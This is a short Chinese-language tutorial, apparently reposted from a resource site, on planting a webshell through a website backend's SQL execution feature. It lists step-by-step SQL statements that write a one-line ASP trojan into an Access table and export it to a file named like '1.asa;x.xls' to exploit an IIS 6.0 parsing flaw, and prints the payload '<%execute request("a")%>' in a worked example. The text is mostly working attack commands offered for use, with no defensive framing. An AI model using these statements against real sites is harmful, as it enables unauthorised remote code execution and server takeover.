实用入侵测试环境往往会遇到一些拿webshell比较棘手的问题,
网站后台执行SQL语句导出一句话拿webshell
。比如后台无法备份数据库或者没有上传点,等一些常用的拿webshell的方法。
可是在后台存在sql语句执行的功能。如果遇到这样的后台就可以通过SQL语句导出一句话拿webshell。
当然也不是在所有的环境都够利用。
比如:
(1).网站服务器使用不是IIS6.0版本(因为这里要用到IIS6.0的解析漏洞)
(2).需要知道网站的ACCESS数据库的表段一般默认的比如:admin或者YCMS_admin
(如果不知道可以下载网站的源程序来分析得到表段)
(3).需要知道网站的的物理路径 一般网站后台主页都会存在。
满足以上条件即可在sql执行语句里面逐一执行以下语句就可以导出一句话了。
第一句代码
create table cmd (a varchar(50))
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句代码
insert into cmd (a) values (‘一句话木马’)
在表cmd的a字段插入一句话木马
第三句代码
select * into [a] in ‘e:webwebshellcc1.asa;x.xls‘ ‘excel 4.0;’from cmd
把cmd表a的内容导出到路径e:webwebshellcc1.asa;x.xls文件(把这里的路径修改为目标主机的路径)
第四句代码
drop table cmd
删除建立的cmd表
或者使用一段代码来导出SQL语句来获得一句话,
电脑资料
《网站后台执行SQL语句导出一句话拿webshell》(https://www.unjs.com)。代码如下:
注释:SELECT ‘<%execute request(“a”)%>’ into [表名] in ‘网站路径+导出的名字(1.asa;1.xls)’ ‘excel 8.0;’ from 表名
例如:SELECT ‘<%execute request(“a”)%>’ into [YCMS_admin] in ‘C:Inetpubwwwrootadmin2.asa;2.xls’ ‘excel 8.0;’ from YCMS_admin
点击执行后然后直接访问网站的路径后面加上导出的名字也就是一句话的文件名就可以获得一句话的的完整的URL 然后直接进行一句话链接就可以获得webshell了。